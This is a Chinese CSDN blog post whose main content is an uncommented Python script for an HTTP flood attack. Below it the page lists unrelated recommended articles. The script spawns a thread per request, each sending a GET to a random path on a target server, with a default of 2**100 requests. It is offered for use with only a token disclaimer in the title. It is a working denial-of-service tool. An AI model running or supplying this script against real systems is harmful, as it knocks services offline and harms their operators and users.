【http攻击】仅限交流,勿从事违法犯罪行为

最新推荐文章于 2024-09-30 19:52:04 发布
最新推荐文章于 2024-09-30 19:52:04 发布
阅读量35 收藏
点赞数
文章标签: http windows 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zskhahaha/article/details/133938134
版权 
#!usr/bin/python3

import socket
import string
import time
import random
import sys
import threading

host = ''
port = 0
ip = ''
num_req = 0
all_list = ["http://192.168.31.1", 80, 1000]

if len(all_list) == 2:
	host = all_list[0].replace("http://", "").replace("https://", "").replace("www.", "")
	port = 80
	num_req = 2**100
elif len(all_list) == 3:
	host = all_list[0].replace("http://", "").replace("https://", "").replace("www.", "")
	port = all_list[1]
	num_req = 2**100
elif len(all_list) == 4:
	host = all_list[0].replace("http://", "").replace("https://", "").replace("www.", "")
	port = all_list[1]
	num_req = all_list[2]
else:
	print(f"Usage: {sys.argv[0]} < Host > < Port > < Number of requests > ")
	print("Default port: 80")
	print("Default number of requests: 1267650600228229401496703205376(2**100)")
	sys.exit(1)

ip = socket.gethostbyname(host)

thread_num = 0
thread_num_mutex = threading.Lock()

def print_status():
	global thread_num
	thread_num_mutex.acquire(True)
	thread_num += 1
	sys.stdout.write(f"\r[{thread_num}]")
	sys.stdout.flush()
	thread_num_mutex.release()

def generate_url_path():
	str_path = str(string.ascii_letters + string.digits + string.punctuation)
	data = "".join(random.sample(str_path, 5))
	return data

def attack():
	print_status()
	url_path = generate_url_path()
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	try:
		s.connect((str(ip), int(port)))
	except ConnectionRefusedError:
		print("Maybe you enter incorect site name!!")
		sys.exit(2)
	byt = (f"GET /{url_path} HTTP/1.1\nHost: {host}\n\n").encode()
	s.send(byt)
	s.shutdown(socket.SHUT_RDWR)
	s.close()

all_thread = []
for i in range(num_req):
	t = threading.Thread(target=attack)
	t.start()
	time.sleep(0.01)
for x in all_thread:
	x.join()
周姝康
关注
FBI教你读心术
qq_43685474的博客
11-15 1577
FBI教你读心术
2020年9月网络安全考试试题
u014265398的博客
09-14 11万+
1.关于数据使用说法错误的是: A.在知识分享、案例中如涉及客户网络数据,应取敏感化,不得直接使用 B.在公开场合、公共媒体等谈论、传播或发布客户网络中的数据,需获得客户书面授权或取敏感化,公开渠道获得的除外。 C 客户网络数据应在授权范围内使用,禁止用于其他目的。 D.项目结束后,若客户未明确要求,可以保存一些客户网络中数据在工作电脑上,以便日后用于对外交流,研讨等引用。 正确答案: D 2.下面哪项 不符合客户书面授权方式: A 电子流 B 邮件 C.口头承诺 D.传真 E.会议纪要 正确答案: C 3
自己编辑的英语stem课程
WWL_521_Forever的博客
04-16 3万+
Lesson 1   Excuse me!  对不起!    Listen to the tape then answer this question. Whose handbag is it?  听录音,然后回答问题,这是谁的手袋?     Excuse me!   Yes?   Is this your handbag?   Pardon?   Is this your handbag?   ...
3-Raven2百个靶机渗透(精写-思路为主)
bmxch的博客
05-08 933
思路清晰先说步骤:1.信息收集,收集到应有的靶机可利用端口。2.用收集到的信息尝试爆破ssh,如果信息足够可用拿到普通用户,最好能一次拿到root3.根据系统版本搜索exp(常规提权),拿到root的shell4.对mysql udf的渗透、提权,思路为主。以上就是对这个靶机的渗透总结了,这里用了mysql udf提权,这个方法现在已经不常用了5.1以后的版本基本无法使用,但是思路是永不过期的,希望大家能好好学习思路,而不是花里胡哨的漏洞偏门。
科研伦理与学术规范期末考试1题库
热门推荐
Internetnewman的博客
12-07 35万+
** 科研伦理与学术规范期末考试1题库 ** 自行复制到自己的文档当中便于搜索 1.科研伦理与学术规范引论 科研伦理与学术规范引论试题 1、下列说法错误的是? A、所有的规范的评判都涉及到“善恶正邪”的价值判断 B、伦理学已经从传统的以人为中心走向现代的以行为为中心 C、现代伦理学主要关注以行为、准则、规范、义务 D、规范则未必均是在道德层面上具有调整性 参考答案:A 2、哈佛模式下的引证规范的特点是? A、注释引证式 B、插句式 C、循环数字编码式 D、MLA引用格式 参考答案:B 3、关于科研伦理和学术
[转]信息安全相关理论题(四)
Herry_Lee的专栏
02-18 3万+
26、____表示邮件服务器返回代码为临时性失败(xx代表任意数)。 A、 2xx B、 3xx C、 4xx D、 5xx 您的答案: 标准答案: C 27、买家称购买商品异常后的正确操作是立即咨询官方客服。 A、 正确 B、 错误 您的答案: 标准答案: A 28、网上陌生人给你发送补丁文件正确的操作是不下载文件。 A、 错误 B、 正确 您的答...
网络安全专业名词解释
qq_40909772的博客
03-04 1万+
Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互,作名词解.
科研诚信与学术规范
CodeAllen嵌入式
03-22 4万+
1【单选题】 为了确保学术和科研( ),多大学制定了荣誉法则。 A、效率 B、质量 C、风格 D、诚信 正确答案: D 我的答案:D 2【判断题】 大学建立荣誉制度的初衷旨在预防大学生考试作弊。 正确答案:√ 我的答案:√ 3【判断题】 科学研究与学术工作与人类其他活动一样,均建立在诚信之上。 正确答案:√ 我的答案:√ 4【判断题】 很多大学制定了荣誉法则的目的是为了确保学...
人格障碍及心理异常的调适
ΓΟΠΑΠ--静静聆听
01-29 5924
关于人格障碍 人格障碍,又称精神病态,或病态人格。 一般情况下,诊断人格障碍,其症状标准至少要符合: 患者有特殊的行为模式,这种行为模式通常表现在多方面,如情感、警觉性、感知和思维方式等,有明显与众不同的态度和行为; 患者具有的特殊行为模式是长期的、持续性的,不限于精神疾病发作期; 患者的特殊行为模式具有普遍性,使得患者社交适应不良。 人格障碍与性行
网络安全—社会工程学
m0_63715896的博客
12-27 2760
一.社会工程学 声明:本人坚决反对利用社会工程学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。 1.什么是社会工程学? 世界第一黑客凯文·米特尼克在《欺骗的艺术》中曾提到,人为因素才是安全的软肋。很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把
《我的宫廷》手游用户协议、用户隐私政策条款
weixin_39338872的博客
01-06 586
《我的宫廷》手游用户协议、用户隐私政策条款 重要须知: 一、用户隐私权政策条款《我的宫廷》尊重并保护所有使用服务用户的个人隐私权。为了给您提供更准确、更有个性化的服务,《我的宫廷》会按照本隐私权政策的规定使用和披露您的个人信息。但《我的宫廷》将以高度的勤勉、审慎义务对待这些信息。除本隐私权政策另有规定外,在未征得您事先许可的情况下,《我的宫廷》不会将这些信息对外披露或向第三方提供。《我的宫廷》会不时更新本隐私权政策。您在同意《我的宫廷》服务使用协议之时,即视为您已经同意本隐私权政策全部内容。本隐私权政策属于
九赢游戏隐私政策
m0_72516525的博客
07-02 1211
更新日期:2022年6月30日生效日期:2022年6月30日山西九赢网络科技有限公司及旗下关联公司(以下简称“九赢游戏”、 “我们”) 深知隐私对您的重要性。我们致力于维持您对我们的信任,在竭力提供良好产品和服务的同时,我们也会尽全力保护并尊重用户(以下统称“用户”或“您”)的个人信息和隐私安全。本政策适用于我们提供的所有九赢游戏服务。当您使用我们任何单项服务时,您同意接受本政策以及我们在该单项服务中发出的特定隐私信息类政策条款(下列称“特定条款”)的保护,在此情况下特定条款与本政策条款同时对您产生效力。若
WebSocket和Http的server send event(sse)/EventSource
の博客
09-27 443
WebSocket是一种在单个TCP连接上进行全双工通讯(双向通信)的协议,能够实现客户端和服务器之间双向的实时持久通信,具备低延迟和高通信效率的特性,且在各种浏览器中都有良好的兼容性,可以广泛应用于Web开发领域。使用场景非常广泛,以下是一些常见的使用场景:即时通讯:WebSocket 非常适合需要即时通讯的场景,如即时聊天、在线游戏、共享文档、远程桌面等。
什么是 HTTP 请求的 X-Forwarded-Proto 字段
汪子熙的专家技术分享
09-29 488
在现代网络架构中,特别是涉及反向代理服务器和负载均衡器的架构中,头部字段扮演着重要角色。反向代理服务器和负载均衡器是常见的网络组件,它们站在客户端和最终服务器之间,处理请求并将其转发到适当的目标服务器。这个过程中,原始客户端请求的信息可能会丢失或者被修改,而提供了一种方法来保留和传递重要的协议信息。
应用层协议 --- HTTP
BUG制造机的博客
09-25 1553
在互联网世界中,HTTP(HyperTextTransferProtocol,超文本传输协议)是一个至关重要的协议。它定义了客户端(如浏览器)与服务器之间如何通信,以交换或传输超文本(如HTML文档)。经过前面的的铺垫学习,我们知道了只要是协议,双方就达成了一定的约定!在这里还需要注意重要的一点是,HTTP的底层是基于TCP进行数据传输的!在这篇文章中我们简单认识了HTTP协议的组成,并且已经简单的实现了浏览器访问云服务器,返回相应数据的功能,希望大家有所收获!
网络原理(5)——HTTPHTTPS
最新发布
Yuan_o_的博客
09-30 479
HTTP、报文格式、代理、抓包工具、请求响应的基本格式、URL、请求报头和响应报头、UA、Referer、Cookie、HTTP状态码、HTTPS的工作流程
深信服上网行为管理:防范违法与泄密
"网络违法与机密泄露-深信服上网行为管理基本功能" 网络违法与机密泄露问题日益严重,其中包括发表恶意言论、访问不合法网站、非法文件的下载和传播,以及通过电子邮件和即时通讯工具导致的信息泄密。为解决这些...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值